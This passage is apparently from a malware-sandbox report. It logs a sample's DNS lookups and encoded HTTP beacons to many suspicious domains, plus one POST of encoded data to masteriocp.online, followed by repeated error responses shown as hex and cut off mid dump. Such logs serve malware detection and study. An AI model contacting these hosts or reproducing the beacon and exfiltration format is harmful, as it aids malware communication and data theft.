            Source: global trafficHTTP traffic detected: GET /06rp/?prutfR_P=ziZdrN3wZJ2qpMxPB7kqr9VBePBO99X6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYa0I3+Rjxysn3aWSNR3EoirWNXIk0ludq4g7uCmltVJnspg==&u8b=M0MH_xux6 HTTP/1.1Host: www.tigre777gg.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /wwak/?prutfR_P=E3TGpDthwwVtcd6zArHMi0+elvxdJNsp076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUa15ZbVJvSSR5vxb+VJw93FLmyr7mIfPMGWfmtP/A6wTj3w==&u8b=M0MH_xux6 HTTP/1.1Host: www.personal-loans-jp8.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /vnd3/?prutfR_P=xYBn5zztkuVfiCwoRQOy2opDl7RgoPyR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERRmF7/bt0PBBiFKuaDRgyJqJJ+MxR9VKTQpRM54mqQi17vQ==&u8b=M0MH_xux6 HTTP/1.1Host: www.quantumnests.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /n59g/?prutfR_P=5pnE2UHiCW8ObGXSgpx/iGO8gW0d7AEBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ha7dmOKO9m7V5QX/Ut0iNssFIOAJa+JBBsuFpAHajyYobg==&u8b=M0MH_xux6 HTTP/1.1Host: www.parcelfly.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0vb3/?prutfR_P=xUzASW4UVirhqEepkKH7G1hhCXRgKJ+LG3aq8idvTSxDBC+AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX+QQCm9qWw==&u8b=M0MH_xux6 HTTP/1.1Host: www.shipincheshi.skinAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /f3w9/?prutfR_P=Dh4Gi9+74bFgt7GfY7nAkA9WO4K4BtRildy9F7aGfftu7RHBnk3NlrVThFQn4aec5hsiNdt2NoWcO3TRD6+a1p9HDTSMRDAgwWxIW4AdBTiWqaWdzxLVl6hXjmw9P5qUhA==&u8b=M0MH_xux6 HTTP/1.1Host: www.fimgroup.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.linkbasic.net
            Source: global trafficDNS traffic detected: DNS query: www.chamadaslotgiris.net
            Source: global trafficDNS traffic detected: DNS query: www.masteriocp.online
            Source: global trafficDNS traffic detected: DNS query: www.mediaplug.biz
            Source: global trafficDNS traffic detected: DNS query: www.independent200.org
            Source: global trafficDNS traffic detected: DNS query: www.tigre777gg.online
            Source: global trafficDNS traffic detected: DNS query: www.monos.shop
            Source: global trafficDNS traffic detected: DNS query: www.personal-loans-jp8.xyz
            Source: global trafficDNS traffic detected: DNS query: www.quantumnests.xyz
            Source: global trafficDNS traffic detected: DNS query: www.abbabyfernando.online
            Source: global trafficDNS traffic detected: DNS query: www.parcelfly.net
            Source: global trafficDNS traffic detected: DNS query: www.siyue.xyz
            Source: global trafficDNS traffic detected: DNS query: www.shipincheshi.skin
            Source: global trafficDNS traffic detected: DNS query: www.fimgroup.net
            Source: unknownHTTP traffic detected: POST /p5rq/ HTTP/1.1Host: www.masteriocp.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USConnection: closeContent-Length: 209Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheOrigin: http://www.masteriocp.onlineReferer: http://www.masteriocp.online/p5rq/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 70 72 75 74 66 52 5f 50 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 51 5a 6f 6c 4e 77 4c 4f 61 2b 75 72 43 7a 4f 38 6a 70 65 37 6a 78 78 30 69 34 66 6e 75 43 53 76 56 73 75 48 56 49 3d Data Ascii: prutfR_P=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uQZolNwLOa+urCzO8jpe7jxx0i4fnuCSvVsuHVI=
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Mon, 16 Sep 2024 07:39:12 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Mon, 16 Sep 2024 07:39:15 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Mon, 16 Sep 2024 07:39:18 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Mon, 16 Sep 2024 07:39:20 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:40:03 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:40:09 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:40:09 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:40:09 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31 39 36 2e 39 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:40:11 GMTServer: ApacheContent-Length: 18121Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 30 68 31 30 30 30 76 32 30 33 2e 31 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 77 61 74 65 72 5f 31 5f 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 78 31 3d 22 35 30 30 22 20 79 31 3d 22 33 35 34 22 20 78 32 3d 22 35 30 30 22 20 79 32 3d 22 32 30 30 2e 36 36 37 22 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 66 66 66 22 2f 3e 0a 20 20 20 20 20 20 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 33 64 63 64 66 22 2f 3e 0a 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 77 61 74 65 72 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 77 61 74 65 72 5f 31 5f 29 22 20 64 3d 22 4d 30 20 32 30 30 2e 37 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 6c 61 6e 64 22 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 33 2e 34 68 31 30 30 30 56 33 35 34 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 